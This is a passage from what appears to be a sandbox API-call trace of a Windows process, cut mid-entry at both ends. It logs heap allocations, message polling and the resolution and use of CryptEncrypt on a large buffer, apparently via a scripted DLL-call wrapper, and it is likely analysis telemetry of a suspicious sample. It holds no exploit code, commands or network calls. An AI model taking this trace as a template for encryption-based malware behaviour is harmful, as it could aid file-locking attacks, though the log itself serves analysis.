lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0262.103] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0262.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0262.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.103] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x55000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x55008) returned 1 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0262.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0262.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0262.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0262.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0262.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0262.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0262.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0262.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0262.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0262.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0262.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0262.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0262.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0262.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0262.107] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0262.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0262.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0262.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0262.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.107] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.107] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0262.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0262.108] CharLowerBuffW (in: lpsz="byte[348168]", cchLength=0xc | out: lpsz="byte[348168]") returned 0xc [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0262.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0262.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0262.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0262.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0262.114] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0262.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0262.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0262.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0262.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0262.148] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0262.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0262.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0262.148] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.149] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0262.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0262.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0262.194] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0262.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0262.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0262.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0262.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51d78 [0262.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.195] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3c9a8c0*, pdwDataLen=0x8cef60*=0x55000, dwBufLen=0x55008 | out: pbData=0x3c9a8c0*, pdwDataLen=0x8cef60*=0x55008) returned 1 [0262.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0262.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0262.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0262.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0262.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0262.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0262.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0262.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0262.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0262.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0262.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0262.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0262.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0262.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0262.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0262.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0262.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0262.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0262.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0262.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0262.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0262.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0262.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0262.214] HeapFree (in: hHeap=0x970000, 